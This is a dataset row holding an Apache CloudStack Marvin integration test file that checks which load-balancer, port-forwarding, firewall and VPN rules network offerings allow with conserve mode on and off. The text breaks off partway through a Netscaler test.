hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
31a5c7d00f423215462d12b7048616b62882fff9 | 80,541 | py | Python | test/integration/component/test_network_offering.py | lafferty/cshv3 | ee0ff7ac240bd24e19db6bd3fb9869dd087442ba | [
"Apache-2.0"
] | 2 | 2015-05-19T05:04:30.000Z | 2016-09-07T00:33:17.000Z | test/integration/component/test_network_offering.py | lafferty/cshv3 | ee0ff7ac240bd24e19db6bd3fb9869dd087442ba | [
"Apache-2.0"
] | null | null | null | test/integration/component/test_network_offering.py | lafferty/cshv3 | ee0ff7ac240bd24e19db6bd3fb9869dd087442ba | [
"Apache-2.0"
] | 2 | 2017-07-07T14:49:03.000Z | 2018-07-31T06:38:42.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for network offering
"""
#Import Local Modules
import marvin
from nose.plugins.attrib import attr
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.integration.lib.utils import *
from marvin.integration.lib.base import *
from marvin.integration.lib.common import *
from marvin.remoteSSHClient import remoteSSHClient
import datetime
class Services:
"""Test network offering Services
"""
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
# Random characters are appended for unique
# username
"password": "password",
},
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100, # in MHz
"memory": 128, # In MBs
},
"network_offering": {
"name": 'Network offering-VR services',
"displaytext": 'Network offering-VR services',
"guestiptype": 'Isolated',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Firewall,Lb,UserData,StaticNat',
"traffictype": 'GUEST',
"availability": 'Optional',
"serviceProviderList": {
"Dhcp": 'VirtualRouter',
"Dns": 'VirtualRouter',
"SourceNat": 'VirtualRouter',
"PortForwarding": 'VirtualRouter',
"Vpn": 'VirtualRouter',
"Firewall": 'VirtualRouter',
"Lb": 'VirtualRouter',
"UserData": 'VirtualRouter',
"StaticNat": 'VirtualRouter',
},
},
"network_offering_netscaler": {
"name": 'Network offering-netscaler',
"displaytext": 'Network offering-netscaler',
"guestiptype": 'Isolated',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Firewall,Lb,UserData,StaticNat',
"traffictype": 'GUEST',
"availability": 'Optional',
"serviceProviderList": {
"Dhcp": 'VirtualRouter',
"Dns": 'VirtualRouter',
"SourceNat": 'VirtualRouter',
"PortForwarding": 'VirtualRouter',
"Vpn": 'VirtualRouter',
"Firewall": 'VirtualRouter',
"Lb": 'Netscaler',
"UserData": 'VirtualRouter',
"StaticNat": 'VirtualRouter',
},
},
"network": {
"name": "Test Network",
"displaytext": "Test Network",
},
"lbrule": {
"name": "SSH",
"alg": "leastconn",
# Algorithm used for load balancing
"privateport": 22,
"publicport": 2222,
"openfirewall": False,
},
"lbrule_port_2221": {
"name": "SSH",
"alg": "leastconn",
# Algorithm used for load balancing
"privateport": 22,
"publicport": 2221,
"openfirewall": False,
},
"natrule": {
"privateport": 22,
"publicport": 22,
"protocol": "TCP"
},
"natrule_port_66": {
"privateport": 22,
"publicport": 66,
"protocol": "TCP"
},
"fw_rule": {
"startport": 1,
"endport": 6000,
"cidr": '55.55.0.0/11',
# Any network (For creating FW rule)
},
"virtual_machine": {
"displayname": "Test VM",
"username": "root",
"password": "password",
"ssh_port": 22,
"hypervisor": 'XenServer',
# Hypervisor type should be same as
# hypervisor type of cluster
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"ostype": 'CentOS 5.3 (64-bit)',
# Cent OS 5.3 (64 bit)
"sleep": 60,
"timeout": 10,
}
class TestNOVirtualRouter(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(
TestNOVirtualRouter,
cls
).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
return
def tearDown(self):
try:
self.account.delete(self.apiclient)
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags = ["advanced"])
def test_01_network_off_without_conserve_mode(self):
"""Test Network offering with Conserve mode off and VR - All services
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should NOT be allowed to add a
# LB rules
# 3. On source NAT ipaddress, we should be NOT be allowed to add
# PF rule
# 4. On an ipaddress that has PF rules, we should NOT be allowed to
# add a LB rules.
# 5. On an ipaddress that has Lb rules, we should NOT allow PF rules
# to be programmed.
# 6. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 7. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 8. On source NAT ipaddress, we should be allowed to Enable VPN.
# 9. On SOurce NAT ipaddress, we will be allowed to add firewall rule
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:off"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering"],
conservemode=False
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_nat_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_nat_rule.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
ip_with_nat_rule.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
ip_with_nat_rule.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_lb_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_lb_rule.ipaddress,
self.network.id
))
self.debug("Creating LB rule for IP address: %s" %
ip_with_lb_rule.ipaddress)
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Trying to create PF rule on IP with LB rule: %s" %
ip_with_nat_rule.ipaddress)
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name
)
# Check if NAT rule created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
return
@attr(tags = ["advanced"])
def test_02_network_off_with_conserve_mode(self):
"""Test Network offering with Conserve mode ON and VR - All services
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should be allowed to add a LB rules
# 3. On source NAT ipaddress, we should be allowed to add a PF rules
# 4. On source NAT ipaddress, we should be allowed to add a Firewall
# rules
# 5. On an ipaddress that has Lb rules, we should be allowed to
# program PF rules.
# 6. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 7. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 8. On source NAT ipaddress, we should be allowed to Enable VPN
# access.
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:off"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering"],
conservemode=True
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug("Created LB rule on source NAT: %s" % src_nat.ipaddress)
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List lb rules should return a valid lb rules"
)
self.assertNotEqual(
len(lb_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT should return a valid port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
self.debug("Associating public IP for network: %s" % self.network.id)
public_ip = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
public_ip.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
public_ip.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=public_ip.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
public_ip.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=public_ip.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=public_ip.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=public_ip.ipaddress.id,
accountid=self.account.name
)
# Check if NAT rule created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
# User should be able to enable VPN on source NAT
self.debug("Created VPN with source NAT IP: %s" % src_nat.ipaddress)
# Assign VPN to source NAT
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VPN response should not be zero"
)
return
class TestNOWithNetscaler(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(
TestNOWithNetscaler,
cls
).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
return
def tearDown(self):
try:
self.account.delete(self.apiclient)
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags = ["advancedns"])
def test_01_network_off_without_conserve_mode(self):
"""Test Nw off with Conserve mode off, VR-All services, LB-netscaler
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should NOT be allowed to add LB rule
# 3. On source NAT ipaddress, we should NOT be allowed to add PF rule
# 4. On an ipaddress that has PF rules, we should NOT be allowed to
# add a LB rules.
# 5. On an ipaddress that has Lb rules , we should NOT allow firewall
# rules to be programmed.
# 6. On an ipaddress that has Lb rules , we should NOT allow PF rules
# to be programmed.
# 7. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 8. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 9. On source NAT ipaddress, we should NOT be allowed to Enable VPN.
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:ON"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=False
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_nat_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_nat_rule.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
ip_with_nat_rule.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
ip_with_nat_rule.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_lb_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_lb_rule.ipaddress,
self.network.id
))
self.debug("Creating LB rule for IP address: %s" %
ip_with_lb_rule.ipaddress)
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
self.debug("Trying to create PF rule on IP with LB rule: %s" %
ip_with_nat_rule.ipaddress)
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id
)
self.debug("Trying to create FW rule on IP with LB rule")
with self.assertRaises(Exception):
FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
# Check if NAT rule created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
# User should be able to enable VPN on source NAT
self.debug("Enabling VPN on source NAT IP: %s" % src_nat.ipaddress)
# Assign VPN to source NAT
with self.assertRaises(Exception):
Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
return
@attr(tags = ["advancedns"])
def test_02_network_off_with_conserve_mode_netscaler(self):
"""Test NW off with Conserve mode ON, LB-Netscaler and VR-All services
"""
# Validate the following
# 1. Create a Network from the above network offering and deploy a VM.
# 2. On source NAT ipaddress, we should NOT be allowed to add LB rule
# 3. On source NAT ipaddress, we should be allowed to add PF rule and
# Fierwall rules.
# 4. On an ipaddress that has PF rules, we should NOT be allowed to
# add a LB rules.
# 5. On an ipaddress that has Lb rules , we should NOT allow firewall
# rules to be programmed.
# 6. On an ipaddress that has Lb rules , we should NOT allow PF rules
# to be programmed.
# 7. We should be allowed to program multiple PF rules on the same Ip
# address on different public ports.
# 8. We should be allowed to program multiple LB rules on the same Ip
# address for different public port ranges.
# 9. On source NAT ipaddress, we should be allowed to Enable VPN.
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:ON"
)
self.network_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=True
)
self.cleanup.append(self.network_offering)
self.debug("Created n/w offering with ID: %s" %
self.network_offering.id)
# Enable Network offering
self.network_offering.update(self.apiclient, state='Enabled')
# Creating network using the network offering created
